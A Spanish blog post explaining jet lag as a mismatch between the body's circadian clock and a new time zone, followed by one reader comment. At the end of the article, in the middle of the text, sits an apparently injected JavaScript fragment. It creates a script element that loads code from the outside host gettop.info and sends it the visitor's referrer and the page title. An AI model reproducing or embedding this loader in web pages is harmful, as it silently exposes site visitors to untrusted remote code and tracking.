Salud y belleza » Enfermedades, Salud

¿Por qué tenemos jet-lag al viajar?

1 Comentario

jet-lag-viajarPara ajustar nuestro cerebro día a día el hipotálamo recibe señales externas como la luz natural. Así se organiza nuestro reloj biológico que marca nuestro patrón de actividad (lo que se denomina ritmo circadiano). También marca las horas de sueños, las horas en las que comemos, nuestra energía… una simple siesta a diario cambia nuestro reloj biológico y lo reajusta.

Nuestro cerebro, a través del reloj biológico o ritmo circadiano, es el que afecta y controla todas las funciones corporales. Uno de los cambios más importantes es el de la melatonina, que se produce solo durante el sueño y que sincroniza nuestro ritmo de vigilia-sueño, noche-día. La presión sanguínea, la temperatura corporal o el cortisol también cambian en función de ese ritmo, por lo que si lo alteramos quedarán alteradas también nuestras funciones.

jet-lagAl viajar a una zona del mundo con horarios distintos al que estamos acostumbrados nuestro ritmo vigilia-sueño queda modificado. El reloj biológico también trata de ajustarse a los cambios de hora, pero si son muy bruscos necesita un tiempo de adaptación.

Si cuando viajamos al extranjero pretendemos seguir inmediatamente el ritmo de nuestro destino con el cambio de horario que supone a nuestro cuerpo no le da tiempo a reajustarse y aparece el jet-lag. El jet-lag es un síndrome que está causado por un desajuste corporal. Se produce por la falta de sincronía entre el reloj interno y las condiciones externas.

¿Has tenido alguna vez jet-lag?s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : ,

One Comment »

  • Bernabé said:

    Yo fui a Estados Unidos y estaba cansado a todas horas, a pesar de que dormí 9 horas que son bastantes. La verdad es que es un co*** cuando te pasa porque quieres rendir pero no das ni la mitad de lo que podrías.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.